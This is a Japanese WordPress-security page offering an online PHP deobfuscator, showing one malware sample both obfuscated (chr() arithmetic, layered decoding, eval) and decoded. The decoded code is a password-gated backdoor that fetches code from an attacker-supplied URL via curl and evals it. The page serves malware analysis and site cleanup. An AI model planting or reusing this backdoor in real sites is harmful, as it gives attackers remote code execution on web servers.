Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(2...



難読化されたPHPコード

<?php $co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$AmInE = "ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d";
$AmineDns = "=UzmWg3DjbWhPCDpOZWsrQ6G1oihZELTU7WX8l/igLzVOqz3y9cfz9tf5Auf69VdvvbJcqSQLTbFrj5/9fkP8dOjoOfNVJjdg0+IQVvi1vlqN7U71i22tolNaXqe7z6drNlssCTyO6fbKP5lWJSRWUn0LsIw7U1CoRsbWwCUt+2oo8b8JDelUBOTqeaIcAhIds04TEbWOBZgPCD5xIXndQHiQWlvCZO8MgzpI9MjTVicHYmEXxJEg5UfJr/V45+ppvVHkl/6ipbNds1KH4uxSiVCKPYtzTODTnRngQgptJg/6OD4DxkRdVuGlJLDp5Y/jDmyY6GWz6VaMtr3A1qMYuLqpYKSYYbQQmAMAZPgWj5fAQRx8BeVMdY3EkCmy685lxkkMl/ZlWwRaOzYe3bndmJv/ClVns3/V4BHTH1JUHP4USrtNaDpDavxxoS6q0jQEA4mCaxK8DBUCvWaQVFn45PoB8VA";/*2e3300cd40ea092e5eeb579abe01e85a*/
eval($co($ro($na($AmInE))));
exit;

デコード(難読化解除)されたコード

<?php

$co = "htmlspecialchars_decode";
$na = "base64_decode";
$ro = "urldecode";
$AmInE = "ZXZhbCUyOCUyNyUzRiUyNmd0JTNCJTI3Lmd6dW5jb21wcmVzcyUyOGd6aW5mbGF0ZSUyOGJhc2U2NF9kZWNvZGUlMjhzdHJyZXYlMjglMjRBbWluZURucyUyOSUyOSUyOSUyOSUyOSUzQg==";
$AmineDns = "=UzmWg3DjbWhPCDpOZWsrQ6G1oihZELTU7WX8l/igLzVOqz3y9cfz9tf5Auf69VdvvbJcqSQLTbFrj5/9fkP8dOjoOfNVJjdg0+IQVvi1vlqN7U71i22tolNaXqe7z6drNlssCTyO6fbKP5lWJSRWUn0LsIw7U1CoRsbWwCUt+2oo8b8JDelUBOTqeaIcAhIds04TEbWOBZgPCD5xIXndQHiQWlvCZO8MgzpI9MjTVicHYmEXxJEg5UfJr/V45+ppvVHkl/6ipbNds1KH4uxSiVCKPYtzTODTnRngQgptJg/6OD4DxkRdVuGlJLDp5Y/jDmyY6GWz6VaMtr3A1qMYuLqpYKSYYbQQmAMAZPgWj5fAQRx8BeVMdY3EkCmy685lxkkMl/ZlWwRaOzYe3bndmJv/ClVns3/V4BHTH1JUHP4USrtNaDpDavxxoS6q0jQEA4mCaxK8DBUCvWaQVFn45PoB8VA";
eval {
    $PAT = 'i';
    $xNgur = 'l';
    $yl = '6';
    $hn = '_';
    $q = 'o';
    $DVe = 'e';
    $VujVi = 'f';
    $Njf = 'n';
    $WL = 't';
    $hjmv = '4';
    $cyx = 'c';
    $w = 'b';
    $qb = 'a';
    $Hn = 'z';
    $C = 's';
    $iEg = 'g';
    $ZQFv = 'd';
    $strNX = "base64_decode";
    $c_init = 'curl_init';
    $c_setopt = 'curl_setopt';
    $c_exec = 'curl_exec';
    if (isset($_GET['u']) && isset($_GET['pw'])) {
        if (strtoupper(md5($_GET['pw'])) != '11A4E7DFA3956D1BBC1BDCF7A9A95A87') {
            exit;
        }
        $ch = $c_init($strNX($_GET['u']));
        $c_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $r = $c_exec($ch);
        eval('?>' . $r);
        die;
    }
};
exit;

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.